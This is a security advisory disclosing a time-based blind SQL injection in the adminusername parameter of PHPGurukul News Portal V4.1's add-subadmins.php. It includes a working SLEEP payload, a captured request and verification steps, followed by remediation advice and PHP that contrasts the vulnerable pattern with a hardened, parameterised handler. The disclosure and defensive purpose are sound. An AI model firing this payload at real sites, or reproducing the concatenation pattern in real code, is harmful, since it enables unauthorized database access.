### Vulnerability Overview

* **Vulnerability Name**: PHPGurukul News Portal Project V4.1 /admin/add-subadmins.php SQL Injection
* **Vulnerability Type**: SQL Injection (time-based blind)
* **Affected Product**: News Portal Project

### Scope of Impact

* **Affected File**: `/admin/add-subadmins.php`
* **Affected Version**: V4.1
* **Vulnerable Parameter**: `adminusername` (POST)
* **Root Cause**: The `adminusername` value is concatenated directly into a SQL query without validation, escaping or parameter binding, so an attacker can close the string literal and append arbitrary SQL. The page is part of the admin panel, so exploitation requires a valid admin session (note the `PHPSESSID` cookie in the request below).

### Proof of Concept (POC)

**Payload:**

```text
adminusername=AAA' RLIKE SLEEP(5) AND 'upg'='upg&email=123@gmail.com&pwd=AAA&submit=
```

The single quote closes the `adminusername` literal; `RLIKE SLEEP(5)` forces MySQL to evaluate `SLEEP(5)` while comparing the row, and `AND 'upg'='upg` re-balances the trailing quote so the query stays syntactically valid.

**Vulnerability Request Packet** (captured with the benign body; replace the body with the payload above and adjust `Content-Length` to reproduce):

```http
POST /newportal/admin/add-subadmins.php HTTP/1.1
Host: 192.168.8.55:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: http://192.168.8.55:8088
Connection: keep-alive
Referer: http://192.168.8.55:8088/newportal/admin/add-subadmins.php
Cookie: PHPSESSID=bfj7rsudh73ulqyubk0761
Upgrade-Insecure-Requests: 1
Priority: u=0, i

adminusername=AAA&email=123@gmail.com&pwd=AAA&submit=
```

**Verification:** send the request once with the benign body and once with the payload. The payload variant should return at least 5 seconds later than the baseline (a multiple of 5 seconds if `SLEEP(5)` is evaluated against several rows), while the benign request returns immediately. The response content is not needed, which is what makes this a blind, time-based injection.

### Remediation Measures

1. **Use Prepared Statements and Parameter Binding**: Prepared statements separate the SQL text from user-supplied values, so a quote or keyword inside `adminusername` is sent as data and is never parsed as SQL.
2. **Conduct Input Validation and Filtering**: Validate user input against an allow-list of the expected format (for a username, a restricted character set and length) and reject anything else before it reaches the database layer. Validation is defence in depth, not a substitute for binding.
3. **Minimize Database User Permissions**: Ensure that the account used to connect to the database possesses only the minimum necessary permissions, avoiding the use of accounts with elevated privileges (such as root or admin) for routine operations. This limits what an injection can do (for example, reading other tables or writing files) even if one is found.
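The following PHP is an added example written for this page; it is not code from the PHPGurukul News Portal project, whose actual query in `/admin/add-subadmins.php` is not reproduced here. The table name `tbladmin`, its column names, and the `$db` connection are assumptions used for illustration. It shows the string-concatenation pattern that produces the injected query above, and beside it a hardened handler that applies all three remediation measures: allow-list validation, `mysqli` prepared statements with bound parameters, and a least-privilege database account.

```php
<?php
// Added example, not the project's own code. Table/column names are assumed.

// --- Vulnerable pattern (assumed shape of the original) ---------------------
// The POST value is spliced into the SQL text, so quotes in it become SQL.
function buildVulnerableQuery(string $adminusername): string
{
    return "SELECT id FROM tbladmin WHERE AdminUserName='" . $adminusername . "'";
}
// With the advisory's payload the string sent to MySQL is:
//   SELECT id FROM tbladmin WHERE AdminUserName='AAA' RLIKE SLEEP(5) AND 'upg'='upg'
// MySQL evaluates SLEEP(5) while comparing rows, which is the observable delay.

// --- Hardened pattern --------------------------------------------------------
// Measure 2: allow-list validation of the username format.
function validateAdminUsername(string $adminusername): bool
{
    // 3..30 characters; letters, digits, underscore and dot only.
    return preg_match('/^[A-Za-z0-9_.]{3,30}$/', $adminusername) === 1;
}

// Measure 1: every value reaches MySQL through a bound parameter, never as SQL text.
function addSubAdmin(mysqli $db, string $adminusername, string $email, string $pwd): bool
{
    if (!validateAdminUsername($adminusername)) {
        return false;
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }

    // Duplicate check with a placeholder: the payload above would simply be
    // looked up as the literal username "AAA' RLIKE SLEEP(5) AND 'upg'='upg".
    $stmt = $db->prepare("SELECT id FROM tbladmin WHERE AdminUserName = ?");
    $stmt->bind_param('s', $adminusername);
    $stmt->execute();
    $stmt->store_result();
    $exists = $stmt->num_rows > 0;
    $stmt->close();
    if ($exists) {
        return false;
    }

    // Store a password hash rather than the plaintext (assumed column names).
    $hash = password_hash($pwd, PASSWORD_DEFAULT);
    $stmt = $db->prepare(
        "INSERT INTO tbladmin (AdminUserName, Email, Password) VALUES (?, ?, ?)"
    );
    $stmt->bind_param('sss', $adminusername, $email, $hash);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Measure 3: connect with a least-privilege account (assumed name/database).
// Create it once on the MySQL side, e.g.:
//   CREATE USER 'newsportal'@'localhost' IDENTIFIED BY '<strong password>';
//   GRANT SELECT, INSERT, UPDATE, DELETE ON newsportal.* TO 'newsportal'@'localhost';
// No FILE, SUPER, or GRANT privileges, and no access to other databases.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw on SQL errors
$db = new mysqli('localhost', 'newsportal', '<strong password>', 'newsportal');

// Request handling for the form in add-subadmins.php (session check omitted).
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit'])) {
    $ok = addSubAdmin(
        $db,
        $_POST['adminusername'] ?? '',
        $_POST['email'] ?? '',
        $_POST['pwd'] ?? ''
    );
    echo $ok ? 'Sub-admin created' : 'Invalid input or username already taken';
}
```

The order matters: validation runs first so malformed usernames never reach the database, but the prepared statements are what actually prevent injection, since a value that passes a regex can still be dangerous in a different query. With `MYSQLI_REPORT_STRICT` enabled, a failed `prepare()` throws instead of returning `false`, so a broken query cannot be silently skipped.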